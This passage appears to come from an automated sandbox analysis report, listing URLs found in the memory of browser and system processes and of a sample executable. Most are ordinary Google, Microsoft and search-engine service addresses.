                      Source: msedge.exe, 00000016.00000002.1897188403.000001E2500D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.comse
                      Source: chrome.exe, 00000013.00000002.1878409482.0000422C00710000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.1877373539.0000422C00494000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://calendar.google.com/calendar/u/0/r/eventedit?usp=chrome_actions
                      Source: chrome.exe, 00000013.00000002.1881066611.0000422C00C0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.ico
                      Source: svchost.exe, 0000000F.00000003.1860719211.000001C278678000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                      Source: chrome.exe, 00000013.00000002.1878349012.0000422C006EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.ico
                      Source: svchost.exe, 0000000F.00000003.1860719211.000001C278678000.00000004.00000020.00020000.00000000.sdmp, Web Data.25.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                      Source: chrome.exe, 00000013.00000002.1881000420.0000422C00BE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/search
                      Source: chrome.exe, 00000013.00000002.1881000420.0000422C00BE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/search?ei=&fr=crmas&p=
                      Source: chrome.exe, 00000013.00000002.1881000420.0000422C00BE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/search?ei=&fr=crmas&p=searchTerms
                      Source: svchost.exe, 0000000F.00000003.1860719211.000001C278678000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.1877723507.0000422C005A4000.00000004.00000800.00020000.00000000.sdmp, Web Data.25.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                      Source: chrome.exe, 00000013.00000002.1876602417.0000422C00328000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000016.00000002.1902875706.0000341C00020000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore
                      Source: chrome.exe, 00000013.00000002.1877723507.0000422C005A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore206E5
                      Source: msedge.exe, 00000016.00000002.1902875706.0000341C00020000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore4
                      Source: chrome.exe, 00000013.00000002.1879180867.0000422C0093C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.1879409281.0000422C009D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en-GB
                      Source: chrome.exe, 00000013.00000002.1878221252.0000422C006BD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en-GBWeb
                      Source: chrome.exe, 00000013.00000003.1860050167.0000422C00C88000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.1875436417.0000422C00108000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.1880032931.0000422C00A7B000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.1878881660.0000422C00874000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1858747770.0000422C00C88000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.1881369455.0000422C00CA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.1876141419.0000422C00284000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.1882738549.0000422C00E78000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.1876602417.0000422C00328000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstoreLDDiscover
                      Source: chrome.exe, 00000013.00000002.1876010025.0000422C0020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromereporting-pa.googleapis.com/v1/events
                      Source: chrome.exe, 00000013.00000002.1876010025.0000422C0020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromereporting-pa.googleapis.com/v1/record
                      Source: chrome.exe, 00000013.00000002.1874625312.0000422C00013000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000016.00000002.1902875706.0000341C00020000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromewebstore.google.com/
                      Source: chrome.exe, 00000013.00000002.1875915640.0000422C001AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://classroom.googleapis.com/
                      Source: chrome.exe, 00000013.00000002.1875915640.0000422C001AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://classroom.googleapis.com/_
                      Source: svchost.exe, 0000000F.00000003.1946419398.000001C2786D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.1957491403.000001C278604000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.1945605573.000001C2786D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.1982760478.000001C278693000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1845200465.00005940002E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1845157006.00005940002D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/cr/report
                      Source: chrome.exe, 00000013.00000002.1877723507.0000422C005A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.1878319689.0000422C006DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.1877687874.0000422C00584000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.1877887664.0000422C0062C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.1875915640.0000422C001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.1881000420.0000422C00BE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.1874625312.0000422C00013000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.1867514158.0000007DE9BFD000.00000004.00000010.00020000.00000000.sdmp, msedge.exe, 00000016.00000002.1902938664.0000341C00040000.00000004.00000800.00020000.00000000.sdmp, manifest.json0.32.drString found in binary or memory: https://clients2.google.com/service/update2/crx
                      Source: chrome.exe, 00000013.00000002.1881000420.0000422C00BE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crx0
                      Source: chrome.exe, 00000013.00000002.1875682617.0000422C0014C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod
                      Source: chrome.exe, 00000013.00000002.1877687874.0000422C00584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crxB
                      Source: chrome.exe, 00000013.00000002.1875915640.0000422C001AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients4.google.com/chrome-sync
                      Source: chrome.exe, 00000013.00000002.1875915640.0000422C001AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients4.google.com/chrome-sync/event
                      Source: chrome.exe, 00000013.00000002.1877723507.0000422C005A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.1880582584.0000422C00AD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clientservices.googleapis.com/chrome-variations/seed?osname=win&channel=stable&milestone=117
                      Source: svchost.exe, 0000000F.00000003.1694519028.000001C2763A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cloudflare-dns.com/dns-query
                      Source: svchost.exe, 0000000F.00000003.1694519028.000001C2763A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cloudflare-dns.com/dns-queryMachineGuidSOFTWARE
                      Source: manifest.json0.32.drString found in binary or memory: https://docs.google.com/
                      Source: chrome.exe, 00000013.00000002.1878579894.0000422C00798000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.1877240234.0000422C00444000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.1878623270.0000422C007B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/u/0/create?usp=chrome_actions
                      Source: chrome.exe, 00000013.00000002.1878579894.0000422C00798000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.1877240234.0000422C00444000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.1878623270.0000422C007B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/forms/u/0/create?usp=chrome_actions
                      Source: chrome.exe, 00000013.00000002.1878579894.0000422C00798000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.1877240234.0000422C00444000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.1878623270.0000422C007B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/forms/u/0/create?usp=chrome_actionsy
                      Source: chrome.exe, 00000013.00000002.1878409482.0000422C00710000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.1877373539.0000422C00494000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/u/0/create?usp=chrome_actions
                      Source: chrome.exe, 00000013.00000002.1878409482.0000422C00710000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.1877373539.0000422C00494000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/u/0/create?usp=chrome_actions
                      Source: manifest.json0.32.drString found in binary or memory: https://drive-autopush.corp.google.com/
                      Source: manifest.json0.32.drString found in binary or memory: https://drive-daily-0.corp.google.com/
                      Source: manifest.json0.32.drString found in binary or memory: https://drive-daily-1.corp.google.com/
                      Source: manifest.json0.32.drString found in binary or memory: https://drive-daily-2.corp.google.com/
                      Source: manifest.json0.32.drString found in binary or memory: https://drive-daily-3.corp.google.com/
                      Source: manifest.json0.32.drString found in binary or memory: https://drive-daily-4.corp.google.com/
                      Source: manifest.json0.32.drString found in binary or memory: https://drive-daily-5.corp.google.com/
                      Source: manifest.json0.32.drString found in binary or memory: https://drive-daily-6.corp.google.com/
                      Source: manifest.json0.32.drString found in binary or memory: https://drive-preprod.corp.google.com/
                      Source: manifest.json0.32.drString found in binary or memory: https://drive-staging.corp.google.com/
                      Source: manifest.json0.32.drString found in binary or memory: https://drive.google.com/
                      Source: chrome.exe, 00000013.00000002.1880860396.0000422C00B74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.1878349012.0000422C006EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.1878785063.0000422C00834000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/?q=
                      Source: chrome.exe, 00000013.00000002.1878785063.0000422C00834000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/?q=searchTerms
                      Source: chrome.exe, 00000013.00000002.1881066611.0000422C00C0C000.00000004.00000800.00020000.00000000.sdmp, Web Data.25.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                      Source: svchost.exe, 0000000F.00000003.1860719211.000001C278678000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.1880928007.0000422C00BA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.1878349012.0000422C006EC000.00000004.00000800.00020000.00000000.sdmp, Web Data.25.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                      Source: chrome.exe, 00000013.00000002.1880928007.0000422C00BA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.1878349012.0000422C006EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.ico
                      Source: svchost.exe, 0000000F.00000003.1860719211.000001C278678000.00000004.00000020.00020000.00000000.sdmp, Web Data.25.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                      Source: svchost.exeString found in binary or memory: https://go.mic
                      Source: svchost.exeString found in binary or memory: https://go.microso
                      Source: msedge.exe, 00000016.00000002.1905572634.0000341C002C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google.com/
                      Source: chrome.exe, 00000013.00000002.1875915640.0000422C001AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google.com/googleapis.com
                      Source: chrome.exe, 00000013.00000002.1877687874.0000422C00584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://googleusercontent.com/
                      Source: chrome.exe, 00000013.00000002.1877687874.0000422C00584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://googleusercontent.com/cr_components/page_image_service/page_image_service.mojom-webui.js
                      Source: chrome.exe, 00000013.00000003.1858158715.0000422C00744000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/161903006
                      Source: chrome.exe, 00000013.00000003.1858158715.0000422C00744000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/166809097
                      Source: chrome.exe, 00000013.00000003.1858158715.0000422C00744000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/184850002
                      Source: chrome.exe, 00000013.00000003.1858158715.0000422C00744000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/187425444
                      Source: chrome.exe, 00000013.00000003.1858158715.0000422C00744000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/220069903
                      Source: chrome.exe, 00000013.00000003.1858158715.0000422C00744000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/229267970
                      Source: chrome.exe, 00000013.00000003.1858158715.0000422C00744000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/250706693
                      Source: chrome.exe, 00000013.00000003.1858158715.0000422C00744000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/253522366
                      Source: chrome.exe, 00000013.00000003.1858158715.0000422C00744000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/255411748
                      Source: chrome.exe, 00000013.00000003.1858158715.0000422C00744000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/258207403
                      Source: chrome.exe, 00000013.00000003.1858158715.0000422C00744000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/274859104
                      Source: chrome.exe, 00000013.00000003.1858158715.0000422C00744000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/284462263
                      Source: chrome.exe, 00000013.00000003.1858158715.0000422C00744000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/issues/166475273
                      Source: chrome.exe, 00000013.00000002.1878579894.0000422C00798000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.1877240234.0000422C00444000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.1878623270.0000422C007B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://keep.google.com/u/0/?usp=chrome_actions#NEWNOTE
                      Source: chrome.exe, 00000013.00000002.1878579894.0000422C00798000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.1877240234.0000422C00444000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.1878623270.0000422C007B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://keep.google.com/u/0/?usp=chrome_actions#NEWNOTEkly
                      Source: chrome.exe, 00000013.00000002.1876010025.0000422C0020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://m.google.com/devicemanagement/data/api
                      Source: msedge.exe, 00000016.00000002.1905572634.0000341C002C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://msn.cn/
                      Source: msedge.exe, 00000016.00000002.1905572634.0000341C002C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://msn.com/
                      Source: chrome.exe, 00000013.00000002.1878409482.0000422C00710000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.1877373539.0000422C00494000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/?utm_source=ga-chrome-actions&utm_medium=manageGA
                      Source: chrome.exe, 00000013.00000002.1878518613.0000422C00774000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.1877281886.0000422C00474000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/data-and-privacy?utm_source=ga-chrome-actions&utm_medium=managePrivacy
                      Source: chrome.exe, 00000013.00000002.1878518613.0000422C00774000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.1877281886.0000422C00474000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/find-your-phone?utm_source=ga-chrome-actions&utm_medium=findYourPhone
                      Source: chrome.exe, 00000013.00000002.1878518613.0000422C00774000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.1877281886.0000422C00474000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/signinoptions/password?utm_source=ga-chrome-actions&utm_medium=changePW
                      Source: chrome.exe, 00000013.00000002.1875915640.0000422C001AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oauthaccountmanager.googleapis.com/
                      Source: chrome.exe, 00000013.00000002.1876010025.0000422C0020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oauthaccountmanager.googleapis.com/v1/issuetoken
                      Source: msedge.exe, 00000016.00000002.1905572634.0000341C002C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://office.net/
                      Source: chrome.exe, 00000013.00000002.1877240234.0000422C00444000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/v1:GetHints
                      Source: msedge.exe, 00000016.00000003.1891357678.0000341C00270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000016.00000003.1890857506.0000341C0026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000016.00000003.1890151780.0000341C00268000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/AddSession
                      Source: msedge.exe, 00000016.00000003.1891357678.0000341C00270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000016.00000003.1890857506.0000341C0026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000016.00000003.1890151780.0000341C00268000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/Logout
                      Source: msedge.exe, 00000016.00000003.1891357678.0000341C00270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000016.00000003.1890857506.0000341C0026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000016.00000003.1890151780.0000341C00268000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/LogoutYxABzen
                      Source: msedge.exe, 00000016.00000003.1891357678.0000341C00270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000016.00000003.1890857506.0000341C0026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000016.00000003.1890151780.0000341C00268000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/MergeSession
                      Source: msedge.exe, 00000016.00000003.1891357678.0000341C00270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000016.00000003.1890857506.0000341C0026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000016.00000003.1890151780.0000341C00268000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/OAuthLogin
                      Source: msedge.exe, 00000016.00000003.1891357678.0000341C00270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000016.00000003.1890857506.0000341C0026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000016.00000003.1890151780.0000341C00268000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/RotateBoundCookies
                      Source: msedge.exe, 00000016.00000003.1891357678.0000341C00270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000016.00000003.1890857506.0000341C0026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000016.00000003.1890151780.0000341C00268000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/chrome/blank.html
                      Source: msedge.exe, 00000016.00000003.1891357678.0000341C00270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000016.00000003.1890857506.0000341C0026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000016.00000003.1890151780.0000341C00268000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/o/oauth2/revoke
                      Source: msedge.exe, 00000016.00000003.1891357678.0000341C00270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000016.00000003.1890857506.0000341C0026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000016.00000003.1890151780.0000341C00268000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/oauth/multilogin
                      Source: msedge.exe, 00000016.00000003.1891357678.0000341C00270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000016.00000003.1890857506.0000341C0026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000016.00000003.1890151780.0000341C00268000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/oauth2/v1/userinfo
                      Source: msedge.exe, 00000016.00000003.1891357678.0000341C00270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000016.00000003.1890857506.0000341C0026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000016.00000003.1890151780.0000341C00268000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/oauth2/v2/tokeninfo
                      Source: msedge.exe, 00000016.00000003.1891357678.0000341C00270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000016.00000003.1890857506.0000341C0026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000016.00000003.1890151780.0000341C00268000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/oauth2/v4/token
                      Source: msedge.exe, 00000016.00000003.1891357678.0000341C00270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000016.00000003.1890857506.0000341C0026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000016.00000003.1890151780.0000341C00268000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/reauth/v1beta/users/
                      Source: msedge.exe, 00000016.00000003.1891357678.0000341C00270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000016.00000003.1890857506.0000341C0026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000016.00000003.1890151780.0000341C00268000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/reauth/v1beta/users/4
                      Source: msedge.exe, 00000016.00000003.1891357678.0000341C00270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000016.00000003.1890857506.0000341C0026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000016.00000003.1890151780.0000341C00268000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/v1/issuetoken
                      Source: chrome.exe, 00000013.00000002.1875052211.0000422C00078000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://safebrowsing.google.com/safebrowsing/clientreport/chrome-sct-auditing
                      Source: chrome.exe, 00000013.00000002.1875052211.0000422C00078000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sctauditing-pa.googleapis.com/v1/knownscts/length/$1/prefix/$2?key=AIzaSyBOti4mM-6x9WDnZIjIe
                      Source: chrome.exe, 00000013.00000002.1875915640.0000422C001AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://securitydomain-pa.googleapis.com/v1/
                      Source: chrome.exe, 00000013.00000002.1875915640.0000422C001AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://securitydomain-pa.googleapis.com/v1/https://clients4.google.com/chrome-sync
                      Source: chrome.exe, 00000013.00000002.1878579894.0000422C00798000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.1877240234.0000422C00444000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.1878623270.0000422C007B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sites.google.com/u/0/create?usp=chrome_actions
                      Source: chrome.exe, 00000013.00000002.1877240234.0000422C00444000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sites.google.com/u/0/create?usp=chrome_actionsactions
                      Source: chrome.exe, 00000013.00000002.1878579894.0000422C00798000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.1878623270.0000422C007B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sites.google.com/u/0/create?usp=chrome_actionsactionsA
                      Source: chrome.exe, 00000013.00000002.1879441086.0000422C009E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://t0.gstatic.com/faviconV2
                      Source: chrome.exe, 00000013.00000002.1875915640.0000422C001AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tasks.googleapis.com/
                      Source: chrome.exe, 00000013.00000002.1875915640.0000422C001AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tasks.googleapis.com/nC
                      Source: chrome.exe, 00000013.00000002.1879142108.0000422C0091C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ww.google.com/
                      Source: HI6VIJERUn.exe, 00000000.00000002.1450618737.0000000000420000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.autoitscript.com/autoit3/
                      Source: svchost.exe, 0000000F.00000003.1860719211.000001C278678000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.1880860396.0000422C00B74000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                      Source: chrome.exe, 00000013.00000002.1881066611.0000422C00C0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/search?q=
                      Source: chrome.exe, 00000013.00000002.1881066611.0000422C00C0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/search?q=&addon=opensearch
                      Source: chrome.exe, 00000013.00000002.1881066611.0000422C00C0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/search?q=&addon=opensearchn=opensearch
                      Source: HI6VIJERUn.exe, 00000000.00000002.1450618737.0000000000420000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.globalsign.com/repository/0
                      Source: HI6VIJERUn.exe, 00000000.00000002.1450618737.0000000000420000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.globalsign.com/repository/06
                      Source: chrome.exe, 00000013.00000002.1877723507.0000422C005A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.1877240234.0000422C00444000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
                      Source: chrome.exe, 00000013.00000002.1882738549.0000422C00E78000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1860581967.0000422C00C98000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.1877825713.0000422C0060C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/
                      Source: chrome.exe, 00000013.00000002.1879180867.0000422C0093C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.1875915640.0000422C001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.1878623270.0000422C007B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/tips/
                      Source: chrome.exe, 00000013.00000002.1879180867.0000422C0093C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.1875915640.0000422C001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.1878623270.0000422C007B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/tips/gs
                      Source: svchost.exe, 0000000F.00000003.1860719211.000001C278678000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.1877687874.0000422C00584000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.1877373539.0000422C00494000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.1880785922.0000422C00B60000.00000004.00000800.00020000.00000000.sdmp, Web Data.25.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                      Source: chrome.exe, 00000013.00000002.1877240234.0000422C00444000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/tools/feedback/chrome/__submit
                      Source: chrome.exe, 00000013.00000002.1874625312.0000422C00013000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/
